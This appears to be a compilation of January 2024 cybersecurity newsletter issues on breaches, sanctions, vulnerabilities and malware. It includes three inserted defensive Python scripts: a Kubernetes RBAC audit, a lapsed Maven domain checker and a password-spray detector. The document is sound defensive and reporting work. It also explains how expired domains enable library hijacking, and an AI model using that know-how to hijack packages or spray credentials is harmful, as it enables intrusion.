DPRK operations in SK: South Korea's NIS intelligence agency says they've seen North Korean groups attempt to incorporate AI in their operations. Officials also said that the DPRK accounts for 80% of all cyberattacks targeting South Korean government networks. [Additional coverage in KBS and Yonhap News]

DPRK crypto-hacks: In 2023, North Korean hackers stole $1 billion worth of crypto assets from 20 organizations, according to data collected by Chainalysis. DPRK groups stole less money than the year before but conducted more intrusions, down from $1.7 billion stolen across 15 incidents in 2022. Overall, 2023 was a bad year for all crypto thieves, who only stole $1.7 billion across 231 incidents, way below the $3.7 billion stolen in 2022.

Chart showing the number of DPRK crypto-heists and the amount of stolen currency
Image: Chainalysis

Vulnerabilities, security research, and bug bounty

Cisco security updates: Cisco has released or updated five security advisories for various products.

Jenkins RCE: The Jenkins automation server has released a security update to patch a major vulnerability. Tracked as CVE-2024-23897, the vulnerability has a severity rating of 9.8/10 and impacts the app's CLI component. The Jenkins team has confirmed various attack scenarios that can allow attackers to retrieve cryptographic keys, delete files, or run malicious code through various methods. If patches can't be installed, the vulnerability can be mitigated by disabling the CLI component. The vulnerability was discovered by Sonar researcher Yaniv Nizry.

GKE Sys:All: Cloud security firm Orca has discovered a security flaw in the Google Kubernetes Engine (GKE) that could be abused to hijack GKE clusters. Named Sys:All, the issue arises from admins misunderstanding the role of the system:authenticated user group in GKE deployments.

"The loophole is not exactly a vulnerability but more an extremely prevalent misconfig stemming from widespread misconception around GKE – many seem to assume that the system:authenticated group in Google Kubernetes Engine includes only verified and deterministic identities. It actually includes any Google-authenticated account, even those outside the organization. This basic misunderstanding leads administrators to regularly enable the group with overly permissive roles, something they wouldn’t do if they realized what the system:authenticated group actually was."

"Orca conservatively estimates that as many as 1 million GKE clusters are vulnerable solely because of this loophole. A brief scan by the team uncovered over 250,000 vulnerable GKE clusters in the wild, some of which contain secrets that would enable lateral movement."
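The misconfiguration Orca describes is easy to audit for. As an added example (not Orca's tooling or anything from GKE itself), the Python script below walks the JSON list output of kubectl and flags every ClusterRoleBinding or RoleBinding that grants system:authenticated or system:unauthenticated anything beyond the discovery-only roles Kubernetes binds to those groups by default. The sample bindings are constructed to match kubectl's output shape, and the allowlist of low-risk roles and the binding names are assumptions for illustration; adjust the allowlist to your own policy.

```python
"""Audit Kubernetes RBAC bindings for grants to the "everyone" groups.

On GKE, system:authenticated is any Google account, not just accounts in the
organization, so a binding to it is effectively public. Feed this script the
output of `kubectl get clusterrolebindings,rolebindings -A -o json`, or run it
stand-alone against the constructed sample at the bottom.
"""
import json
import sys

# Subjects that mean "anyone": any Google account, or anonymous requests.
OVERLY_BROAD_SUBJECTS = {
    ("Group", "system:authenticated"),
    ("Group", "system:unauthenticated"),
}

# Default Kubernetes roles that only expose API discovery/version metadata.
# Assumed allowlist for illustration; tighten or extend per organization policy.
LOW_RISK_ROLES = {"system:basic-user", "system:discovery", "system:public-info-viewer"}


def find_broad_bindings(binding_list: dict) -> list[dict]:
    """Return one finding per binding that grants a non-trivial role to everyone."""
    findings = []
    for item in binding_list.get("items", []):
        meta = item.get("metadata", {})
        role = item.get("roleRef", {}).get("name", "")
        for subject in item.get("subjects") or []:
            key = (subject.get("kind"), subject.get("name"))
            if key in OVERLY_BROAD_SUBJECTS and role not in LOW_RISK_ROLES:
                findings.append({
                    "binding_kind": item.get("kind"),
                    "binding": meta.get("name"),
                    "namespace": meta.get("namespace"),  # None for cluster scope
                    "subject": subject.get("name"),
                    "role": role,
                })
    return findings


# Constructed sample mimicking kubectl's JSON list output (not real cluster data).
SAMPLE = {
    "items": [
        {   # default binding: discovery-only role, so not a finding
            "kind": "ClusterRoleBinding",
            "metadata": {"name": "system:discovery"},
            "roleRef": {"kind": "ClusterRole", "name": "system:discovery"},
            "subjects": [{"kind": "Group", "name": "system:authenticated"}],
        },
        {   # the Sys:All pattern: cluster-admin for anyone with a Google account
            "kind": "ClusterRoleBinding",
            "metadata": {"name": "everyone-admin"},
            "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
            "subjects": [{"kind": "Group", "name": "system:authenticated"}],
        },
        {   # namespaced secret access for anyone: the lateral-movement case
            "kind": "RoleBinding",
            "metadata": {"name": "read-secrets", "namespace": "payments"},
            "roleRef": {"kind": "Role", "name": "secret-reader"},
            "subjects": [{"kind": "Group", "name": "system:authenticated"}],
        },
        {   # correctly scoped: a named group instead of system:authenticated
            "kind": "ClusterRoleBinding",
            "metadata": {"name": "sre-admin"},
            "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
            "subjects": [{"kind": "Group", "name": "sre-team@example.com"}],
        },
    ]
}

if __name__ == "__main__":
    data = SAMPLE if sys.stdin.isatty() else json.load(sys.stdin)
    for finding in find_broad_bindings(data):
        scope = finding["namespace"] or "<cluster>"
        print(f"{finding['binding_kind']} {scope}/{finding['binding']}: "
              f"{finding['subject']} -> {finding['role']}")
```

The remediation for each finding is the last sample binding: replace the group with the explicit users, groups or service accounts that actually need the role, rather than trying to keep the broad group and trim the role.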

Leaky API keys: API security platform Escape says it found more than 18,000 API keys exposed on the internet after scanning 189.5 million URLs.

35-year-old vulnerability: JFrog researchers look at a duo of libX11 vulnerabilities (a DoS and RCE) that can be used to attack Linux environments. The two bugs impact all libX11 versions dating back to 1989.

GTB vulnerabilities: A group of security researchers going by the "Adepts of 0xCC" have published a write-up on two vulnerabilities that can be used to hack into GTB Central Console, a data loss prevention platform.

Triton vulnerability: Security firm ProtectAI has found a vulnerability in the API of Triton, a type of inference server used by the AI/ML industry. PoC code is available on GitHub.

Chrome zero-day PoC: A proof-of-concept exploit was released for CVE-2022-4262, a Chrome zero-day patched back in December 2022.

Zyxel PoC: SSD has published a proof-of-concept for a pre-auth RCE in Zyxel routers. SSD didn't say if the bugs were reported or patched.

Infosec industry

Industry moves: Former NSO Group executives, including the former CEO Shalev Hulio, launched a new company named Dream Security. The new company allegedly hired 13 former NSO Group employees and secured a $33 million round of venture capital funding. According to Hulio, Dream Security will provide cybersecurity defenses for critical infrastructure entities. Hulio first touted Dream Security back in October 2022, shortly after leaving NSO in August 2022. [Additional coverage in The Intercept]

New tool—SECurityTr8Ker: Security researcher Pancak3lullz has released a tool named SECurityTr8Ker that can monitor the SEC's RSS feed for 8K and 6K filings for cybersecurity incidents. The script currently powers a Twitter account here. There's also another account that tracks these things here and a different web portal for tracking SEC disclosures here.

New tool—cvemap: Project Discovery has open-sourced a tool named cvemap, a CLI utility designed to provide a structured and easily navigable interface to various vulnerability databases.

CLI output of the cvemap tool
Image: Project Discovery

Risky Business Podcasts

In this podcast episode of the Seriously Risky Business series, Patrick Gray and Tom Uren talk about the SEC’s new disclosure rules, which mean companies have four days to report cyber security incidents once they’ve formally decided that they are material. So far, companies are very much erring on the side of caution.

They also look at the criticism of the CSRB’s board composition. Tom thinks these critiques are misguided. The cyber security landscape is so fractured that if the board were made up of faceless bureaucrats it would get very limited traction.

Risky Biz News: AU, UK, US sanction Russian behind Medibank ransomware attack

24 January 2024 at 00:30

This newsletter is brought to you by Material Security, the company that secures the cloud office with unified email security, user behavior analytics, and data loss prevention for Microsoft 365 and Google Workspace. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Australia, the UK, and the US have sanctioned a Russian national for his role in a ransomware attack on Australian private insurance provider Medibank in October 2022.

Identified as Alexander Ermakov, he is believed to be connected to the REvil ransomware operation, where he allegedly operated under pseudonyms such as GustaveDore, JimJones, Blade_Runner, and aiiis_ermak. Ermakov is believed to be 33 and a resident of Moscow.

Officials say Ermakov was a "pivotal" and "key actor" in REvil's attack on Medibank, considered one of Australia's worst cybersecurity incidents.

The REvil gang breached the private insurer's network, stole data, encrypted systems, and then leaked portions of the data on the dark web in an attempt to pressure the company into paying a $10 million ransom demand.

More than 9.7 million patient records were stolen in the attack, and more than 480,000 health claims were posted on REvil's dark web leak site.

The records contained names, dates of birth, Medicare numbers, and sensitive medical information. Some of the leaked health claims contained information about sensitive procedures, such as abortions and mental health treatment.

Officials say Ermakov was directly involved in breaching and releasing the data.

At the time, the hack and the appalling extortion tactics triggered an aggressive response from the Australian government, which set up a permanent operation to hunt down cybercriminal syndicates.

Named Operation Aquila, the initiative is a joint effort with personnel from both the Australian Federal Police (AFP) and the Australian Signals Directorate (ASD).

Ermakov is the first individual tracked down by Aquila and the first cybercriminal to be sanctioned by the Australian government.

The joint AU-UK-US sanctions include both financial sanctions and travel bans. Australian officials warned that anyone breaking the sanctions faces up to ten years in an Australian prison.

Photos of Alexander Ermakov

Breaches, hacks, and security incidents

DDoS attacks on Romanian govt sites: Pro-Kremlin hacktivist group NoName launched DDoS attacks on several Romanian government websites. The impact was extremely minor, and local authorities barely noticed the downtime.

Trezor breach: Cryptocurrency wallet service Trezor has confirmed that a threat actor gained access to the data of 66,000 customers after gaining access to its support ticketing portal. Trezor says all users who registered an account on its support portal since December 2021 are affected. The company says the hacker used data from the portal to contact 41 customers and attempt to obtain data about their wallet recovery seeds.

Trello leak: A threat actor is selling a list of more than 15 million emails that were scraped from internet-exposed Trello boards.

LoanDepot ransomware aftermath: American mortgage provider LoanDepot has confirmed that the data of almost 16.6 million customers was stolen in a ransomware attack at the start of the year. In an update provided to customers and shareholders, LoanDepot says it made significant progress in restoring loan servicing systems that were impacted by the attack. The company is the fourth major US mortgage and real estate insurance provider that was hit by a cyberattack over the past months. Similar incidents have also affected Mr. Cooper, Fidelity National Financial, and First American Financial.

Jason's Deli cred-stuffing attack: American fast food chain Jason's Deli says that threat actors gained access to more than 344,000 customer accounts on its reward points portal after a successful credential-stuffing attack.

SEC Twitter hack: The SEC has published a final report on how its Twitter account got hacked. It was SIM swapping and a lack of MFA, as initially suspected.

MOAB leak: Security researcher Bob Dyachenko has discovered a database exposed online that contains more than 26 billion user records. The leaky database appears to aggregate data from more than 3,800 past data breaches. Dyachenko was unable to identify the database's owner and named the leak the Mother of all Breaches (MOAB) since it's currently the biggest leak known to date. [Additional coverage in CyberNews]

Concentric Finance cyber-heist: Cryptocurrency platform Concentric Finance lost $1.6 million in assets in a security incident that took place earlier this week. The company says the attacker managed to social-engineer one of its employees and gain access to one of its wallets. Blockchain security firm CertiK linked the attack to the same threat actor who stole $2.7 million worth of crypto-assets from OKX in December of last year.

GMEE cyber-heist: The operators of the GMEE (or Gamee) cryptocurrency token lost $15 million worth of assets after hackers exploited one of its smart contracts. All the stolen tokens were from the project's reserve, and no user-owned tokens were affected. The token lost 40% of its value in the aftermath of the hack. [Additional coverage in the DailyCoin]

Pegasus in Togo: Traces of the Pegasus spyware were found on the phones of two independent Togolese journalists. The infections took place throughout 2021 and were discovered by the security team of Reporters Without Borders. The organization was providing assistance to the two journalists after they were arrested in December after reporting on a theft from the home of one of the country's ministers. According to a report from French newspaper Le Monde, the Togo government was a customer of NSO Group at the time of the infections.

General tech and privacy

Meta will let EU users unlink its services: Social media company Meta will let EU users unlink its services from one another.

"People using Instagram and Facebook in the EU, EEA and Switzerland will soon be offered several choices about how they would like to manage their experiences across Meta products. We are offering these choices to address the requirements of the DMA, which enter into force in March 2024."

First IPv4 sunset date: The Czech government has announced that it will stop providing its services via IPv4 on June 2, 2032, making this the first unofficial IPv4 sunset date.

Amazon fined in France: French privacy watchdog CNIL has fined American retail giant Amazon €32 million for using "an excessively intrusive system for monitoring employee activity and performance" at its warehouses across the country. The fine also covers the company's use of video surveillance without warning employees and for not securing the accounts used to access the surveillance system.

Apple fined in Russia: The Russian government has fined Apple $13.5 million for not allowing third-party payment systems on the iOS App Store.

iOS Stolen Device Protection: Apple's new Stolen Device Protection feature is now live in the company's latest iOS 17.3 release.

Chrome 121: Google has released version 121 of its Chrome browser. See here for security patches and webdev-related changes. The biggest changes in this release include the addition of an AI-based tab organizer and theme generator, a new side panel, and the start of Chrome's third-party cookie deprecation procedures.

An image of Chrome's new AI-powered theme generator

Government, politics, and policy

Russia's emoji ban: A Russian Duma member has proposed a law that will ban roughly two dozen emojis on smartphones sold in Russia. The ban covers LGBTQ-themed emojis that depict same-sex families, pregnant men, bearded women, and men in wedding dresses, among others. The law was proposed by Alexey Zhuravlev, a member of the Rodina party. It comes after a Russian judge outlawed LGBTQ activism, and authorities started a countrywide crackdown on members of the LGBTQ community. This is the second time the Russian Duma is looking at a law to ban same-sex emojis after a similar attempt in 2015. [Additional coverage in Rossiyskaya Gazeta]

CISA Director swatted: CISA Director Jen Easterly was the target of a swatting attempt, according to a report from The Record, citing sources inside CISA. The attacker claimed gunfire was heard from Easterly's house on the night of December 30, last year. The CISA official was unharmed after Arlington County Police arrived on scene and determined no shooting had occurred. The incident comes as a large number of US officials have been swatted over the past weeks, with two incidents targeting the White House itself.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Ivan Dwyer of Material Security about how it makes sense to view office productivity suites as an organisation's critical infrastructure.

Cybercrime and threat intel

Killnet leader interview: Russian news outlet Gazeta has published an interview with BTC, the new leader of the pro-Kremlin hacktivist group Killnet. The outlet previously doxed the gang's former leader, a 30-year-old named Nikolai Nikolaevich Serafimov, known as Killmilk. BTC took credit for the destructive attack that crippled Ukrainian mobile operator Kyivstar. Ukrainian officials previously attributed the attack to Sandworm, a GRU-managed APT group.

WS: Fortinet has published a profile of WS, a threat actor that has published nine malicious Python libraries via the PyPI portal over the past years.

A timeline chart showing the WS threat actor's operations

Fake loan apps: Indian security firm CyFirma looks at a campaign from a Pakistani threat actor targeting Indians with fake loan apps infected with malware.

npm malware caught stealing SSH keys: ReversingLabs researchers have discovered two npm libraries designed to steal SSH keys from infected developer machines and upload the data to a GitHub repository.

"Fortunately, the reach of this campaign was limited. ReversingLabs observed different accounts publishing warbeast2000 and kodiak2k on npm. The warbeast2000 package was downloaded a little less than 400 times, whereas the kodiak2k was downloaded around 950 times."

Ransomware in 2023: The number of ransomware victims listed on dark web leak sites in 2023 was 4,667, a figure 84% higher than the number of victims listed in 2022.

Malware technical reports

BianLian ransomware: Palo Alto Networks researchers have found a shared tool used by the BianLian and the Makop ransomware gangs.

Cactus ransomware: ShadowStackRE has published an analysis of Cactus, a ransomware operation that launched in May of last year.

Kasseika ransomware: Trend Micro researchers have discovered a new ransomware operation named Kasseika. The ransomware was first spotted in 2023 and is one of the rare groups that uses the Bring-Your-Own-Vulnerable-Driver (BYOVD) approach for its intrusions. Kasseika becomes the fourth ransomware strain to use BYOVD after the likes of Akira, BlackByte, and AvosLocker. Trend Micro says the group appears to resemble the BlackMatter ransomware operation, which shut down in late 2021.

The Kasseika ransomware infection chain

NS-Stealer: Trellix has published a technical report on a new infostealer written in Java and named NS-Stealer that can steal web browser data and upload it to Discord bot channels.

Godzilla webshell: Trustwave looks at Godzilla, a JSP webshell that the company recently saw being planted on hacked Apache ActiveMQ hosts.

DarkGate: Kroll's security team has published a report on the DarkGate malware's encoding system.

SystemBC: The same team also published a report on the C2 server system used by the SystemBC malware family.

New macOS malware: Kaspersky has discovered a suite of cracked and pirated macOS apps secretly installing infostealers on user devices.

VexTrio: Infoblox has published a report on VexTrio, a traffic distribution system (TDS) that launched in 2017 and currently redirects traffic from hacked websites to more than 60 cybercrime operations. Its customers include ClearFake and SocGholish, two other TDS operations, showing how these groups often collaborate with each other rather than compete.

VexTrio's connections to other cybercrime operations

Sponsor Section

A deep dive into what's new with Material Security's Phishing Protection product: New detections, response UX boosters, and more actionable reports.

APTs, cyber-espionage, and info-ops

UAC-0050: CERT-UA has published a report on UAC-0050's latest spear-phishing campaign targeting Ukrainian government agencies. The group has been at it for a year now, with non-stop attacks aimed at Ukrainian agencies. On the same note, AhnLab also spotted a SmokeLoader campaign targeting Ukrainian government organizations. It is unclear which threat actor was behind this one.

ScarCruft: North Korean hacking group ScarCruft (APT37) has conducted a spear-phishing campaign that targeted members of the South Korean cybersecurity community. Spotted by SentinelOne, the campaign took place throughout November and December of 2023. Besides infosec professionals, the campaign also targeted media organizations and high-profile experts in North Korean affairs. ScarCruft's final payload was the group's typical malware, the RokRAT remote access trojan.

Lazarus: AhnLab analyzes a new DLL side-loading technique used by the Lazarus APT group in attacks targeting South Korean organizations.

OceanLotus: Chinese security firm CrackME looks at recent OceanLotus operations targeting Chinese organizations.

Vulnerabilities, security research, and bug bounty

MavenGate research: More than 6,100 Java libraries listed on the Maven Central package repository appear to have been abandoned by their authors. A Maven groupId is a reversed domain name, and ownership of that namespace is proven through the domain; the domains behind these libraries have expired, so an attacker can register them, claim the namespace, and publish hijacked versions of the library. Security firm Oversecured says some of the libraries are dependencies in some of today's most popular Java projects, including apps from companies like Amazon, Google, Facebook, Microsoft, Adobe, and Netflix.
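The check a consumer of these libraries can run on their own dependency tree follows directly from the naming convention: reverse the groupId back into a domain and see whether that domain is still alive. The script below is an added example, not Oversecured's tooling. It assumes the Maven Central convention that a domain-based groupId such as `com.example.lib` belongs to whoever controls `example.com`, and it skips namespaces such as `io.github.*` where ownership is tied to a hosting account rather than DNS. The groupIds and the fake DNS answers are constructed so the example runs offline; pass the real resolver to use it on a live dependency list.

```python
"""Flag Maven groupIds whose backing domain no longer resolves (added example)."""
import socket

# Namespaces where Maven Central proves ownership via a hosting account, not DNS.
HOSTED_PREFIXES = ("io.github.", "com.github.", "org.bitbucket.",
                   "io.gitlab.", "com.gitlab.")


def group_id_to_domain(group_id):
    """'com.example.lib' -> 'example.com'; None for single-label groupIds like 'commons-io'."""
    labels = group_id.split(".")
    if len(labels) < 2 or not all(labels):
        return None
    return f"{labels[1]}.{labels[0]}"


def live_resolver(domain):
    """True if the domain still resolves to an address (stdlib only, no extra deps)."""
    try:
        socket.getaddrinfo(domain, None)
        return True
    except socket.gaierror:
        return False


def find_lapsed(group_ids, resolves=live_resolver):
    """Return {groupId: domain} for every domain-based groupId whose domain does not resolve."""
    lapsed = {}
    for gid in sorted(set(group_ids)):
        if gid.startswith(HOSTED_PREFIXES):
            continue
        domain = group_id_to_domain(gid)
        if domain is None:
            continue
        if not resolves(domain):
            lapsed[gid] = domain
    return lapsed


# Constructed dependency list and DNS answers (example.org / example.net are
# reserved documentation domains; the answers below are made up).
SAMPLE_GROUP_IDS = ["org.example.parser", "net.example.legacy-utils",
                    "io.github.someuser.tool", "commons-io", "org.example.parser"]
FAKE_DNS = {"example.org": True, "example.net": False}


def demo():
    """Run the check against the constructed data with a fake resolver."""
    return find_lapsed(SAMPLE_GROUP_IDS, resolves=lambda d: FAKE_DNS.get(d, False))


if __name__ == "__main__":
    for gid, domain in demo().items():
        print(f"{gid}: {domain} does not resolve; verify registration before trusting updates")
```

A domain that does not resolve is a lead, not a verdict: it may be registered but parked, so confirm with an RDAP/WHOIS lookup before raising it. The reverse is also true, a domain that resolves today may already have been re-registered by someone else, which is why pinning versions and verifying artifact checksums matters regardless of what DNS says.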

Apple patches WebKit zero-day: Apple has released security updates for all its products to patch a new zero-day (CVE-2024-23222) in its WebKit browser engine. Patches were made available for iOS, macOS, iPadOS, tvOS, and Safari. The company also backported fixes for two zero-days (CVE-2023-42916 & CVE-2023-42917) it patched in November of last year to its older generation of devices. This is Apple’s first zero-day this year after having patched 20 zero-days in 2023.

Splunk security updates: Splunk has released security patches to fix five vulnerabilities in its products.

Fortra security update: Fortra has published a patch for its GoAnywhere file-sharing server. The security update fixes an authentication bypass tracked as CVE-2024-0204 discovered by two software engineers from Spark Engineering Consultants. A PoC has been published here.

WifiKey PoC: SSD has published a proof-of-concept for a still-unpatched pre-auth RCE vulnerability in WifiKey's AC Gateway product.

Bitcoin ATM vulnerabilities: IOActive researchers have found a series of vulnerabilities that could allow a physical attacker to steal user assets from Lamassu Douro Bitcoin ATMs.

Confluence exploitation: Threat actors are exploiting a recently patched Atlassian Confluence vulnerability. Tracked as CVE-2023-22527, the vulnerability has a severity rating of 10/10 and allows for unauthenticated remote code execution attacks. According to the Shadowserver Foundation, attacks began on January 19, three days after Atlassian released a patch. After the attacks got underway, technical write-ups and proof-of-concept code were published by several Chinese and Vietnamese researchers.

Ivanti exploitation: According to Censys, 412 of more than 26,000 internet-exposed Ivanti Connect Secure VPN appliances have been compromised with a backdoor after being exploited using two new zero-days (CVE-2023-46805 & CVE-2024-21887).

VMWare vCenter exploitation: Censys researchers say they have seen 3,541 VMWare vCenter servers exposing their web panel on the internet, but only 293 of these were running the DCERPC service. The service contains a vulnerability that has been secretly exploited in the wild by a Chinese APT group since late 2021. VMWare released patches for the vulnerability (CVE-2023-34048) in October of last year.

World map showing the location of vulnerable VMWare vCenter servers
Image: The Shadowserver Foundation

Infosec industry

Industry moves: F5 has named Samir Sherif as its new Senior VP and CISO. Sherif previously served as CISO at Absolute Software and Imperva. Sherif takes over the CISO role from Gail Coury, who is retiring in March. [Additional coverage in SecurityWeek]

Pwn2Own Automotive 2024: The Pwn2Own Automotive 2024 hacking contest is taking place in Tokyo this week. The contest has rewards of up to $1 million. The full schedule is here.

New tool—GraphStrike: Pen-testing company Red Siege has open-sourced a tool named GraphStrike to enable the use of Cobalt Strike Beacons via the Microsoft Graph API for HTTPS C2 communications.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.

Risky Biz News: SVR hackers breach Microsoft, steal emails from the security team

22 January 2024 at 00:30

This newsletter is brought to you by Material Security, the company that secures the cloud office with unified email security, user behavior analytics, and data loss prevention for Microsoft 365 and Google Workspace. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Russian state-sponsored hackers have breached Microsoft's internal network and have stolen emails from the company's senior leadership, legal, and cybersecurity teams.

The intrusion began in late November of 2023 and lasted until January 13, when Microsoft kicked the hackers off its network.

The Redmond-based giant attributed the attack to Midnight Blizzard, one of the cyber units inside Russia's Foreign Intelligence Service (SVR).

In a blog post, Microsoft said the group breached its network after conducting a password spray attack on a non-production test tenant account and then pivoted to its corporate email accounts system.
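The reason a password spray gets past a tenant that would have caught brute force is that it inverts the ratio: one or two passwords against many accounts, so no single account ever reaches its lockout threshold. The detector below is an added example, not Microsoft's code or telemetry. It groups failed sign-ins by source IP, slides a time window over them, alerts when a window covers many distinct accounts with very few failures each, and then lists any account that later signed in successfully from the same source, which is the list a responder needs to reset first. The tenant, accounts and addresses in the log are constructed (documentation IP ranges).

```python
"""Password-spray detection over sign-in logs (added example)."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sign-in log: timestamp, source IP, account, result.
# 203.0.113.7 sprays one password across five accounts and then lands on a
# service account; 198.51.100.9 is a plain brute force against one account.
SAMPLE_LOG = """\
2024-01-14T03:00:01Z 203.0.113.7 alice@contoso-test.example FAIL
2024-01-14T03:00:04Z 203.0.113.7 bob@contoso-test.example FAIL
2024-01-14T03:00:09Z 203.0.113.7 carol@contoso-test.example FAIL
2024-01-14T03:00:15Z 203.0.113.7 dave@contoso-test.example FAIL
2024-01-14T03:00:22Z 203.0.113.7 erin@contoso-test.example FAIL
2024-01-14T03:00:30Z 203.0.113.7 svc-legacy@contoso-test.example SUCCESS
2024-01-14T03:01:00Z 198.51.100.9 alice@contoso-test.example FAIL
2024-01-14T03:01:05Z 198.51.100.9 alice@contoso-test.example FAIL
2024-01-14T03:01:10Z 198.51.100.9 alice@contoso-test.example FAIL
2024-01-14T03:01:15Z 198.51.100.9 alice@contoso-test.example FAIL
2024-01-14T03:01:20Z 198.51.100.9 alice@contoso-test.example FAIL
2024-01-14T03:01:25Z 198.51.100.9 alice@contoso-test.example SUCCESS
2024-01-14T09:15:00Z 192.0.2.44 alice@contoso-test.example SUCCESS
"""


def parse_log(text):
    """Parse the whitespace-separated sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "ip": ip, "user": user, "result": result})
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """One alert per source IP that, inside `window`, failed against at least
    `min_users` distinct accounts with no more than `max_per_user` failures each."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "FAIL"]
        start = 0
        for end, newest in enumerate(fails):
            # Slide the window so it spans at most `window` of failures.
            while newest["ts"] - fails[start]["ts"] > window:
                start += 1
            per_user = Counter(e["user"] for e in fails[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                window_start = fails[start]["ts"]
                # Successes from the sprayer after the spray began are the accounts to reset.
                hits = sorted({e["user"] for e in evs
                               if e["result"] == "SUCCESS" and e["ts"] >= window_start})
                alerts[ip] = {"window_start": window_start,
                              "sprayed_users": sorted(per_user),
                              "successful_logins": hits}
                break
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(ip, alert)
```

The brute-force source is deliberately not flagged here: five failures on one account is what a per-account lockout rule is for, and folding it into this rule would just raise the noise floor. Thresholds are the tuning knob; a sprayer working a large tenant slowly will need a longer window and a higher `min_users`, and the accounts that matter most are the ones whose success shows up in `successful_logins` without an MFA prompt.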

According to an SEC filing, the threat actor initially searched and stole information about what Microsoft knew of Midnight Blizzard's activities.

Chart showing Midnight Blizzard's position inside the SVR service
Image: Joe Slowik

Microsoft's disclosure language does not specifically state that this was the only stolen information, but it is worth pointing out that Microsoft is currently hosting the Ukrainian government's entire network on its Azure cloud infrastructure.

The breach has drawn quite an avalanche of criticism and ridicule for Microsoft for various and well-deserved reasons.

First, Microsoft disclosed the breach late on a Friday night— a well-known scummy tactic to hide the incident from extended media coverage.

Second, the breach took place weeks after Microsoft announced, with bells and whistles, its new Secure Future Initiative, a new plan to re-focus the company's engineering efforts to improve the security of its own products. The new initiative was meant to mimic a similar pledge made by Bill Gates in 2002—named Trustworthy Computing—that led to significant changes to Microsoft's security posture and the creation of what we now know as Patch Tuesday.

Third, the new breach took place four months after Microsoft disclosed another state-sponsored hack, this one by China's Storm-0558, which also had access to its internal network.

Fourth, after promoting MFA as the next evolution of online account security, the fact that one of its test accounts got popped via a password spray suggests Microsoft wasn't high on its own supply.

Mastodon post from an AWS engineer on the Microsoft hack

The hack is quite bad, but not for most of you reading this email. It may not have a material impact on day-to-day Microsoft users, but it does considerable reputational damage to Microsoft's position in the cybersecurity market.

Having Russian intelligence services breach your cybersecurity team's email accounts to steal data about themselves four months after the Chinese breached your production systems to steal US government emails is not what this industry calls trustworthy.

At what point, or after which hack, will the US government stop and re-evaluate its giant dependency on Microsoft infrastructure, something that has been rubbing a lot of people the wrong way lately?


Breaches, hacks, and security incidents

HHS hack: A threat actor stole $7.5 million from the US Department of Health and Human Services in a security breach that took place between March and mid-November of last year. The attackers are believed to have gained access to an HHS system that processes civilian grant payments using spear-phishing. They then proceeded to hijack payments for five grant recipients before being detected. The investigation to identify the perpetrators is still underway. [Additional coverage in Bloomberg]

Ivanti attacks on federal networks: CISA is investigating potential breaches at US government agencies that could have been carried out through vulnerabilities in Ivanti Connect Secure VPN appliances. The vulnerabilities were disclosed on January 10 by US cybersecurity firm Volexity, which said the bugs were being exploited in the wild by Chinese state-sponsored hackers. Attacks targeting Ivanti products entered a phase of mass exploitation immediately after Volexity's disclosure. CISA issued an emergency directive instructing federal agencies to patch the Ivanti bugs as soon as possible. A CISA spokesperson told reporters that roughly 15 US government agencies were using Ivanti products before the attacks. [Additional coverage in Axios]

GVSU hack: A Ukrainian hacker group named BlackJack has breached and wiped more than 150 systems belonging to the Main Military Construction Directorate for Special Facilities (GVSU), a state-owned company that builds military facilities for the Russian military. The group claims it also downloaded more than 1.2TB of information from the company's servers containing information on more than 500 military objectives. The BlackJack group has been informally linked to the Security Service of Ukraine. Ukraine's Main Directorate of Intelligence, or GUR, praised the attack on Telegram as a major success. [Additional coverage in UkrInform/English coverage in BusinessInsider]

KSU ransomware attack: Kansas State University is dealing with a ransomware attack that impacted some of its IT networks, such as email servers, WiFi networks, and VPN systems.

VF Corp ransomware attack: The personal data of more than 35.5 million customers was stolen in a ransomware attack in December 2023, VF Corp confirmed in an SEC filing. The company operates more than 13 retail brands across the world, such as The North Face, Dickies, Vans, Timberland, and Supreme. The AlphV ransomware group took credit for the attack days before the gang's infrastructure was seized by US law enforcement.

SK data breach: Hackers breached South Korea's National Council of Social Welfare and stole the personal data of more than 1.35 million volunteer workers. [Additional coverage in KBS]

Lockbit claims go wild: The Lockbit ransomware gang took credit for breaching two large companies, Swift Air and Subway. Neither intrusion has been verified, but the claims may be worth keeping an eye on, especially since Swift Air has filed for bankruptcy and will most likely not be in a position to pay.

Healthcare breaches in 2023: More than 115 million US patient records were exposed or stolen through data breaches in 2023, according to Fortified, a healthcare industry cybersecurity provider. The figure is almost double the 2022 numbers when almost 60 million patient records were exposed online. The number of healthcare breaches went down in 2023, suggesting larger providers were hit last year than the year before. In total, Fortified says that more than 489 million patient records were compromised in data breaches across the US over the last decade.

Charts showing healthcare breach stats from the last decade

General tech and privacy

Google News failings: Google News is failing to remove AI-written articles copied from legitimate outlets, an investigation has discovered. Questioned on the matter, Google says it doesn't care if the articles are AI or human-written. [Additional coverage in 404 Media]

Firefox sabotage: Mozilla has accused the three major browser makers—Apple, Google, and Microsoft—of sabotaging Firefox. The company says it has launched a new issue tracker "where we intend to document the ways in which platforms put Firefox at a disadvantage."

Brave removes strict fingerprinting protection: The Brave team has removed its strict anti-fingerprinting protection from its web browser. The team argued the feature is hardly used and is known to cause websites to function incorrectly.

Government, politics, and policy

